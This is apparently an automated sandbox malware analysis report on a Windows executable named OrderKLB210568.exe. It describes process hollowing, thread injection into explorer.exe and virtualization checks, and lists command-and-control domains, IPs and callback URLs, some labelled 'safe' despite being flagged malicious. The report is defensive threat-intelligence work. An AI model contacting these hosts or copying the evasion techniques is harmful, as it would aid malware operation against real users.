          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerVirtualization/Sandbox Evasion3SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information2NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing11LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsFile and Directory Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncSystem Information Discovery13Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 433298 Sample: OrderKLB210568.exe Startdate: 11/06/2021 Architecture: WINDOWS Score: 100 31 www.voyagoezy.com 2->31 39 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->39 41 Found malware configuration 2->41 43 Malicious sample detected (through community Yara rule) 2->43 45 5 other signatures 2->45 11 OrderKLB210568.exe 20 2->11         started        signatures3 process4 file5 29 C:\Users\user\AppData\Local\...\System.dll, PE32 11->29 dropped 55 Detected unpacking (changes PE section rights) 11->55 57 Maps a DLL or memory area into another process 11->57 59 Tries to detect virtualization through RDTSC time measurements 11->59 15 OrderKLB210568.exe 11->15         started        signatures6 process7 signatures8 61 Modifies the context of a thread in another process (thread injection) 15->61 63 Maps a DLL or memory area into another process 15->63 65 Sample uses process hollowing technique 15->65 67 Queues an APC in another process (thread injection) 15->67 18 explorer.exe 15->18 injected process9 dnsIp10 33 trueandbare.com 162.144.21.92, 49767, 80 UNIFIEDLAYER-AS-1US United States 18->33 35 www.customtiletables.com 154.201.212.113, 49773, 80 POWERLINE-AS-APPOWERLINEDATACENTERHK Seychelles 18->35 37 15 other IPs or domains 18->37 47 System process connects to network (likely due to code injection or exploit) 18->47 22 raserver.exe 18->22         started        signatures11 process12 signatures13 49 Modifies the context of a thread in another process (thread injection) 22->49 51 Maps a DLL or memory area into another process 22->51 53 Tries to detect virtualization through RDTSC time measurements 22->53 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          OrderKLB210568.exe33%ReversingLabsWin32.Spyware.Noon
          OrderKLB210568.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nsq144C.tmp\System.dll0%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\nsq144C.tmp\System.dll0%ReversingLabs

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          1.2.OrderKLB210568.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          9.2.raserver.exe.33fcd80.2.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.2.OrderKLB210568.exe.22b0000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          9.2.raserver.exe.5607960.5.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.2.OrderKLB210568.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File
          1.0.OrderKLB210568.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File
          1.1.OrderKLB210568.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.0.OrderKLB210568.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.scgcarriers.com/noor/?1bWh=MrymD1JTSi9icjGKk8gDaU+0x7uPJ/DMShO0SAEbIObMq4sdMjmwzvuhTtB1BmEBq3Cn&z6A=SROlIdu00%Avira URL Cloudsafe
          http://www.pinnacleautism.com/noor/?1bWh=yBBObmCyAJHV9q/laG6R4VeleE6hM9O/9rRknywdqzDMYOPfeqQhGmZFlzULPSD48dad&z6A=SROlIdu00%Avira URL Cloudsafe
          http://www.customtiletables.com/noor/?1bWh=aLSZaEbZcY+nJL/coxA+SeOeWAYt8B9E/LcznQPuCd+SSEpvsuzJsFlKySIeZ1LxQ2fR&z6A=SROlIdu00%Avira URL Cloudsafe
          www.brochusuell.com/noor/0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          https://www.plafon.one/noor/?1bWh=xnNqGXCWkFApROrJz350BdHFb13BnEMQPSq0%Avira URL Cloudsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.trueandbare.com/noor/?1bWh=4rG107LnOcmcuziIBv//fTWAPRyuaqL3ZCNKQGbegtiOA/J/96Y+2s4SPBA+G2lg6sqa&z6A=SROlIdu00%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.astromaritravel.com/noor/?1bWh=AHmkjMmF5A51F9E2l+bDZjEpvTE04T0IuK3gjYUfTOhZyeiT49VRPb60+qMIaT57BRzI&z6A=SROlIdu00%Avira URL Cloudsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.plafon.one/noor/?1bWh=xnNqGXCWkFApROrJz350BdHFb13BnEMQPSq+Heyas7SGX58S4jH7yXEPKWiH2cfubfT5&z6A=SROlIdu00%Avira URL Cloudsafe
          http://www.velvetlaceextensions.com/noor/?1bWh=HXv2ci8qflo+sTzlFu6p6ayrdzzy8jUJJ1L5hJzxjEzCyp3/Ui7nWA8VYIXOKVKH4kcG&z6A=SROlIdu00%Avira URL Cloudsafe
          http://www.marryobaidanjum.com/noor/?1bWh=KyjbU3AKX/1ra4+yobi9yViduRe0x0FUVCXAE/BWsKVHYHaI6gSvGLTvxwAp00IgFIet&z6A=SROlIdu00%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          td-balancer-euw2-6-109.wixdns.net
          		35.246.6.109
          		truefalse
            		unknown
            www.plafon.one
            		45.87.1.159
            		truetrue
              		unknown
              www.pinnacleautism.com
              		74.208.236.54
              		truetrue
                		unknown
                www.scgcarriers.com
                		34.215.126.147
                		truetrue
                  		unknown
                  trueandbare.com
                  		162.144.21.92
                  		truetrue
                    		unknown
                    www.customtiletables.com
                    		154.201.212.113
                    		truetrue
                      		unknown
                      ghs.googlehosted.com
                      		142.250.180.243
                      		truefalse
                        		unknown
                        target.clickfunnels.com
                        		104.16.13.194
                        		truefalse
                          		high
                          www.trueandbare.com
                          		unknown
                          		unknowntrue
                            		unknown
                            www.voyagoezy.com
                            		unknown
                            		unknowntrue
                              		unknown
                              www.marryobaidanjum.com
                              		unknown
                              		unknowntrue
                                		unknown
                                www.tcheaptvwdmall.com
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.jarsofjoybylinathomas.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.velvetlaceextensions.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.astromaritravel.com
                                      		unknown
                                      		unknowntrue
                                        		unknown

                                        Contacted URLs

                                        NameMaliciousAntivirus DetectionReputation
                                        http://www.scgcarriers.com/noor/?1bWh=MrymD1JTSi9icjGKk8gDaU+0x7uPJ/DMShO0SAEbIObMq4sdMjmwzvuhTtB1BmEBq3Cn&z6A=SROlIdu0true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.pinnacleautism.com/noor/?1bWh=yBBObmCyAJHV9q/laG6R4VeleE6hM9O/9rRknywdqzDMYOPfeqQhGmZFlzULPSD48dad&z6A=SROlIdu0true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.customtiletables.com/noor/?1bWh=aLSZaEbZcY+nJL/coxA+SeOeWAYt8B9E/LcznQPuCd+SSEpvsuzJsFlKySIeZ1LxQ2fR&z6A=SROlIdu0true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        www.brochusuell.com/noor/true
                                        • Avira URL Cloud: safe
                                        		low
                                        http://www.trueandbare.com/noor/?1bWh=4rG107LnOcmcuziIBv//fTWAPRyuaqL3ZCNKQGbegtiOA/J/96Y+2s4SPBA+G2lg6sqa&z6A=SROlIdu0true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.astromaritravel.com/noor/?1bWh=AHmkjMmF5A51F9E2l+bDZjEpvTE04T0IuK3gjYUfTOhZyeiT49VRPb60+qMIaT57BRzI&z6A=SROlIdu0false
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.plafon.one/noor/?1bWh=xnNqGXCWkFApROrJz350BdHFb13BnEMQPSq+Heyas7SGX58S4jH7yXEPKWiH2cfubfT5&z6A=SROlIdu0true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.velvetlaceextensions.com/noor/?1bWh=HXv2ci8qflo+sTzlFu6p6ayrdzzy8jUJJ1L5hJzxjEzCyp3/Ui7nWA8VYIXOKVKH4kcG&z6A=SROlIdu0false
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.marryobaidanjum.com/noor/?1bWh=KyjbU3AKX/1ra4+yobi9yViduRe0x0FUVCXAE/BWsKVHYHaI6gSvGLTvxwAp00IgFIet&z6A=SROlIdu0true
                                        • Avira URL Cloud: safe
                                        		unknown

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmpfalse
                                          		high
                                          http://www.fontbureau.comexplorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmpfalse
                                            		high
                                            http://www.fontbureau.com/designersGexplorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmpfalse
                                              		high
                                              http://www.fontbureau.com/designers/?explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmpfalse
                                                		high
                                                http://www.founder.com.cn/cn/bTheexplorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.fontbureau.com/designers?explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmpfalse
                                                  		high
                                                  http://www.tiro.comexplorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.fontbureau.com/designersexplorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmpfalse
                                                    		high
                                                    http://nsis.sf.net/NSIS_ErrorErrorOrderKLB210568.exefalse
                                                      		high
                                                      http://www.goodfont.co.krexplorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.carterandcone.comlexplorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.sajatypeworks.comexplorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.typography.netDexplorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmpfalse
                                                        		high
                                                        http://www.founder.com.cn/cn/cTheexplorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://www.plafon.one/noor/?1bWh=xnNqGXCWkFApROrJz350BdHFb13BnEMQPSqraserver.exe, 00000009.00000002.923694061.0000000005782000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://fontfabrik.comexplorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.founder.com.cn/cnexplorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.fontbureau.com/designers/frere-user.htmlexplorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmpfalse
                                                          		high
                                                          http://nsis.sf.net/NSIS_ErrorOrderKLB210568.exefalse
                                                            		high
                                                            http://www.jiyu-kobo.co.jp/explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.fontbureau.com/designers8explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmpfalse
                                                              		high
                                                              http://www.%s.comPAexplorer.exe, 00000004.00000000.670973820.0000000002B50000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		low
                                                              http://www.fonts.comexplorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmpfalse
                                                                		high
                                                                http://www.sandoll.co.krexplorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.urwpp.deDPleaseexplorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.zhongyicts.com.cnexplorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.sakkal.comexplorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown

                                                                Contacted IPs

                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs

                                                                Public

                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                162.144.21.92
                                                                		trueandbare.comUnited States
                                                                		46606UNIFIEDLAYER-AS-1UStrue
                                                                154.201.212.113
                                                                		www.customtiletables.comSeychelles
                                                                		132839POWERLINE-AS-APPOWERLINEDATACENTERHKtrue
                                                                45.87.1.159
                                                                		www.plafon.oneNetherlands
                                                                		204601ON-LINE-DATAServerlocation-NetherlandsDrontenNLtrue
                                                                34.215.126.147
                                                                		www.scgcarriers.comUnited States
                                                                		16509AMAZON-02UStrue
                                                                104.16.13.194
                                                                		target.clickfunnels.comUnited States
                                                                		13335CLOUDFLARENETUSfalse
                                                                35.246.6.109
                                                                		td-balancer-euw2-6-109.wixdns.netUnited States
                                                                		15169GOOGLEUSfalse
                                                                74.208.236.54
                                                                		www.pinnacleautism.comUnited States
                                                                		8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                142.250.180.243
                                                                		ghs.googlehosted.comUnited States
                                                                		15169GOOGLEUSfalse

                                                                General Information

                                                                Joe Sandbox Version:32.0.0 Black Diamond
                                                                Analysis ID:433298
                                                                Start date:11.06.2021
                                                                Start time:15:41:15
                                                                Joe Sandbox Product:CloudBasic
                                                                Overall analysis duration:0h 9m 27s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:light
                                                                Sample file name:OrderKLB210568.exe
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                Number of analysed new started processes analysed:18
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:1
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • HDC enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Detection:MAL
                                                                Classification:mal100.troj.evad.winEXE@7/4@15/8
                                                                EGA Information:Failed
                                                                HDC Information:
                                                                • Successful, ratio: 33.4% (good quality ratio 31.3%)
                                                                • Quality average: 78.1%
                                                                • Quality standard deviation: 28.8%
                                                                HCA Information:
                                                                • Successful, ratio: 90%
                                                                • Number of executed functions: 0
                                                                • Number of non-executed functions: 0
                                                                Cookbook Comments:
                                                                • Adjust boot time
                                                                • Enable AMSI
                                                                • Found application associated with file extension: .exe
                                                                Warnings:
                                                                Show All
                                                                • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                • Excluded IPs from analysis (whitelisted): 13.64.90.137, 168.61.161.212, 52.113.196.254, 13.107.3.254, 92.122.145.220, 204.79.197.200, 13.107.21.200, 20.82.209.183, 20.54.104.15, 2.20.142.209, 2.20.142.210, 20.54.7.98, 20.54.26.129, 92.122.213.194, 92.122.213.247, 20.82.210.154
                                                                • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, s-ring.msedge.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, teams-9999.teams-msedge.net, e12564.dspb.akamaiedge.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, www.bing.com, skypedataprdcolwus17.cloudapp.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, s-ring.s-9999.s-msedge.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, s-9999.s-msedge.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, teams-ring.teams-9999.teams-msedge.net, teams-ring.msedge.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • VT rate limit hit for: /opt/package/joesandbox/database/analysis/433298/sample/OrderKLB210568.exe

                                                                Simulations

                                                                Behavior and APIs

                                                                No simulations

                                                                Joe Sandbox View / Context

                                                                IPs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                104.16.13.194SHIPPING DOCUMENT_7048555233PDF.exeGet hashmaliciousBrowse
                                                                • www.centralcoastcardeals.com/s5cm/?p0G=ndfPKtxxGRrhJ&jrTDmX=DSY0EDCDD+YeOSsOeVrohqA0jZiCMu+13z6pcWj9wX33NVIOZFaPvb2F9+ei6kk9Qnu7
                                                                KWX1rM9GB0.exeGet hashmaliciousBrowse
                                                                • www.procircleacademy.com/p2io/?blm=tgVoMP8hy712gjXN0MPWwDnGYGbnfEGTJ+qBX8UiY81/M2eSzcjcnNoRbyNJn2XxWYPo&KpL=J6AlD
                                                                FY9Z5TR6rr.exeGet hashmaliciousBrowse
                                                                • www.christinahsmith.com/bucw/?4hlPBD=CHD6SuwIjZ9h2icNo7L4/fbzWRoWdLlGzAfgZZUtjZnBiTWO9EdGelqaWD5oh/GjtbLFc97xbw==&l0GD1=xBZDi6rpmLdp-
                                                                DHL Receipt_AWB811470484778.exeGet hashmaliciousBrowse
                                                                • www.confidenceismine.com/a7dr/?S0Gl9T=RPHlpDKhNf_x&vT=dnvIMHrhIFZI8uuPAm9WThCu/REVEUd3DdQyK3KMHWY0n7fwKMG/Mz11hX+Zz8QkrBgm
                                                                PR#270473.exeGet hashmaliciousBrowse
                                                                • www.mindsetinfluencers.com/dug/?6l=90PvAoH7bkGXjpstOdtF9iizKFVf1uOM7Tdn1BuXI4OG3P0y7UPdP7UuxsQckLAd165P&r6A=G43DHNl8mln4WV
                                                                PO-SIWM20032502 DOCUMENTS.exeGet hashmaliciousBrowse
                                                                • www.onlineordersecrets.com/y04g/?NtfdRn=8p7xvrjPR&llsp=UrhIF1QR5ejoxWlQBXjs3pihysGHRaro4c2Kym27UU1e52SSio/beOyk5aeC6pxdWrDL
                                                                7Q5Er1TObp.exeGet hashmaliciousBrowse
                                                                • www.sproutsocialleads.com/vu9b/?FTjl4F=U9xCBvhYdzW2pkZRLiexASB0COBn66nGI5ZDJNJEXWpF6I91AY5IakWKJolF3fQhQxRq&vRDtx=khL0M89p_R8hBZa
                                                                pcBhOkLiD3.exeGet hashmaliciousBrowse
                                                                • www.procircleacademy.com/p2io/?Jtx=tgVoMP8hy712gjXN0MPWwDnGYGbnfEGTJ+qBX8UiY81/M2eSzcjcnNoRbyNJn2XxWYPo&EHL0Iv=gbWxer18SV
                                                                Sales Contract_DNZFKNSU1020.xlsxGet hashmaliciousBrowse
                                                                • www.beautybossprogram.com/m0rc/?Bb2=F4yVs8skMO0xdc+KBq+tlGvav62DYDwgLc19EdhDJNUNtLOusMyh91jMQ1ym/Sp6Mg+OYg==&sFN=_HMpKHd
                                                                PO-3170012466.exeGet hashmaliciousBrowse
                                                                • www.carwindesign.com/bbk4/?tXi0=MXbP9&h0DhlHu=KPjL+Enjko2aPvO5gttb004zk0Tb+0bau9GmWUxmv4fa+q9Qem4DykLAPZ8H+/BgEyKD
                                                                SWIFT Payment DOOEL EUR 74,246.41 20210101950848.exeGet hashmaliciousBrowse
                                                                • www.boundlesshealthyliving.com/isub/?E6A=mKq5jMPFB2vQ6dpnem4Wv+n0tAgqabEeTgbNNpuVrJgVt0V1V2JiWkOjehY2GkWwfsMrH2/H/Q==&oPqLWR=dVbHu890-L10
                                                                IRS Notice Letter.exeGet hashmaliciousBrowse
                                                                • www.theconnectioncure4anewlife.com/09rb/?vDH4Y=N8lT8DApP2&QL3=3cioSIM7qc+NUPSaNWZDf5ZgG6yWTmtMZW7D0nuOBM+xnzhIhBh/M/TwInC5jJRx2dan6wLlwg==

                                                                Domains

                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                www.scgcarriers.comPO.exeGet hashmaliciousBrowse
                                                                • 52.10.170.153
                                                                target.clickfunnels.comtzeEeC2CBA.exeGet hashmaliciousBrowse
                                                                • 104.16.16.194
                                                                ENrFQVzLHE.exeGet hashmaliciousBrowse
                                                                • 104.16.16.194
                                                                SHIPPING DOCUMENT_7048555233PDF.exeGet hashmaliciousBrowse
                                                                • 104.16.13.194
                                                                packa.....(1).exeGet hashmaliciousBrowse
                                                                • 104.16.15.194
                                                                DHL4198278Err-PDF.exeGet hashmaliciousBrowse
                                                                • 104.16.12.194
                                                                n2fpCzXURP.exeGet hashmaliciousBrowse
                                                                • 104.16.15.194
                                                                feAfWrgHcX.exeGet hashmaliciousBrowse
                                                                • 104.16.16.194
                                                                KWX1rM9GB0.exeGet hashmaliciousBrowse
                                                                • 104.16.13.194
                                                                Compliance A.xlsxGet hashmaliciousBrowse
                                                                • 104.16.14.194
                                                                Wire Payment Of $35,276.70.exeGet hashmaliciousBrowse
                                                                • 104.16.15.194
                                                                New Order_PO 1164_HD-F 4020 6K.exeGet hashmaliciousBrowse
                                                                • 104.16.12.194
                                                                FY9Z5TR6rr.exeGet hashmaliciousBrowse
                                                                • 104.16.13.194
                                                                DHL Receipt_AWB811470484778.exeGet hashmaliciousBrowse
                                                                • 104.16.13.194
                                                                PR#270473.exeGet hashmaliciousBrowse
                                                                • 104.16.13.194
                                                                Updated April SOA.xlsxGet hashmaliciousBrowse
                                                                • 104.16.14.194
                                                                zDUYXIqwi4.exeGet hashmaliciousBrowse
                                                                • 104.16.12.194
                                                                MrV6Do8tZr.exeGet hashmaliciousBrowse
                                                                • 104.16.12.194
                                                                FORM C.xlsxGet hashmaliciousBrowse
                                                                • 104.16.12.194
                                                                xx.exeGet hashmaliciousBrowse
                                                                • 104.16.13.194
                                                                qmhFLhRoEc.exeGet hashmaliciousBrowse
                                                                • 104.16.12.194

                                                                ASN

                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                POWERLINE-AS-APPOWERLINEDATACENTERHKKY4cmAI0jU.exeGet hashmaliciousBrowse
                                                                • 45.195.169.197
                                                                L2.xlsxGet hashmaliciousBrowse
                                                                • 45.195.169.197
                                                                triage_dropped_file.exeGet hashmaliciousBrowse
                                                                • 107.151.118.54
                                                                fD56g4DRzG.exeGet hashmaliciousBrowse
                                                                • 160.124.142.209
                                                                PROFORMA INVOICE PDF.exeGet hashmaliciousBrowse
                                                                • 185.51.167.23
                                                                Invoice.exeGet hashmaliciousBrowse
                                                                • 185.51.167.23
                                                                LQrGhleECP.exeGet hashmaliciousBrowse
                                                                • 154.220.41.208
                                                                Shipping Docs677.exeGet hashmaliciousBrowse
                                                                • 154.201.218.227
                                                                Benatos June Order-Project 2021 Specification Document and company Profile _PDF.exeGet hashmaliciousBrowse
